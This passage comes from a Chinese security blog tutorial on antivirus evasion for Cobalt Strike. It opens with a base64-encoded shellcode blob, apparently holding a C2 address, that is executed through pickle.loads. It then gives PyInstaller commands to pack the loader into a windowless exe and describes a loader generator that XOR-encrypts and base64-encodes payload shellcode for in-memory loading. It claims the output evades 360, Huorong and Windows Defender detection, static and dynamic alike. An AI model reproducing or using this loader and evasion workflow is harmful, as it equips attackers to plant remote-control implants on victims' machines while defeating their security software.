ng0WW1SY2VHWTBYSGcyT0Z4NE0yUmNlRFl6WEhnMk0xeDRabUpjZUdaaVhIZzFabHg0T0RsY2VEa3hYSGc1TkZ4NE5HUmNlREUxWEhobU1GeDRPR1pjZURWalhIZzVNbHg0TVdGY2VHWmlYSGc0WVZ4NFlURmNlRFkxWEhoaFkxeDROR1JjZUdKaVhIZ3haVng0WXpOY2VEbGhYSGcwTTF4NFltTmNlRE5tWEhnMllWeDROalZjZURJMFhIZzVaRng0TXpCY2VEazFYSGcxTTF4NFlUaGNlR1ZqWEhnME1GeDROV0ZjZUROaFhIZ3hNRng0T1RWY2VEY3pYSGcxTTF4NE5UZGNlR1EwWEhneFlWeDRZVE5jZUdWalhIZzJZMXg0TVRkY2VHRmhYSGc0WTF4NE1tSmNlRGs1WEhnMU9GeDRNemhjZUdWalhIZ3lORng0WWpoY2VERTNYSGcyTlZ4NE9EbGNlRFV6WEhoallseDRaV1JjZURRM1hIaGtaRng0WVRGY2VHUXhYSGc1WkZ4NE56RmNlR1UzWEhnME5GeDRZVGxjZURnMFhIZ3dPRng0WmpCY2VHWTBYSGhrWTF4NFpEVmNlREF3WEhnME1WeDRZbVZjZUdZd1hIaGlOVng0WVRKY2VEVTJYSGhtWmx4NFpEVmNlRFE0WEhnek1WeDRZemxjZUdKaFhIZ3dNRng0TURCY2VEUXdYSGd3TUZ4NE5ERmNlR0k0WEhnd01GeDRNVEJjZURBd1hIZ3dNRng0TkRGY2VHSTVYSGcwTUZ4NE1EQmNlREF3WEhnd01GeDROREZjZUdKaFhIZzFPRng0WVRSY2VEVXpYSGhsTlZ4NFptWmNlR1ExWEhnME9GeDRPVE5jZURVelhIZzFNMXg0TkRoY2VEZzVYSGhsTjF4NE5EaGNlRGc1WEhobU1WeDRORGhjZURnNVhIaGtZVng0TkRGY2VHSTRYSGd3TUZ4NE1qQmNlREF3WEhnd01GeDRORGxjZURnNVhIaG1PVng0TkRGY2VHSmhYSGd4TWx4NE9UWmNlRGc1WEhobE1seDRabVpjZUdRMVhIZzBPRng0T0ROY2VHTTBYSGd5TUZ4NE9EVmNlR013WEhnM05GeDRZalpjZURZMlhIZzRZbHg0TURkY2VEUTRYSGd3TVZ4NFl6TmNlRGcxWEhoak1GeDROelZjZUdRM1hIZzFPRng0TlRoY2VEVTRYSGcwT0Z4NE1EVmNlREF3WEhnd01GeDRNREJjZURBd1hIZzFNRng0WXpOY2VHVTRYSGc1Wmx4NFptUmNlR1ptWEhobVpseDRNekZjZURNNVhIZ3pNbHg0TW1WY2VETXhYSGd6Tmx4NE16aGNlREpsWEhnek1seDRNekZjZURNelhIZ3laVng0TXpGY2VETXlYSGd6T1Z4NE1EQmNlREF3WEhnd01GeDRNREJjZURBeCcKc2hlbGxjb2RlID0gYmFzZTY0LmI2NGRlY29kZShzaGVsbGNvZGUpCn' pickle.loads(base64.b64decode(shellcode))
成功上线
使用 pyinstaller 进行打包成 exe。
pyinstaller.exe --noconsole --onefile 1.py
过程如下
如图
python框架免杀上线cs
将shellcode进行xor加密后,再base64编码,使用内存加载器加载上线C2
环境
python==2.7
pip install pyinstaller==3.0pyinstaller-script.py的第一行需要删掉
pyinstaller.exe --noconsole --onefile 1.py
使用方法
cs生成64位payload.bin文件,选择一个加载器模板,运行后在loader_result文件夹生成相应加载器源文件和exe文件(生成exe需要安装pyinstaller)
使用如下命令
python2 XG_MS_LOADER.py 64.bin UUID_loader1
在loader_result文件夹下生成导报好的exe文件和py文件
免杀效果
可过360和火绒静态查杀
可过Defender静态查杀
可过Defender、360和火绒动态查杀
免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。
转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。
先知社区:
博客:
CSDN:
https://blog.csdn.net/weixin_48899364?type=blog
公众号:
FreeBuf:
SecIN:
文章来源: https://xz.aliyun.com/t/11992
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh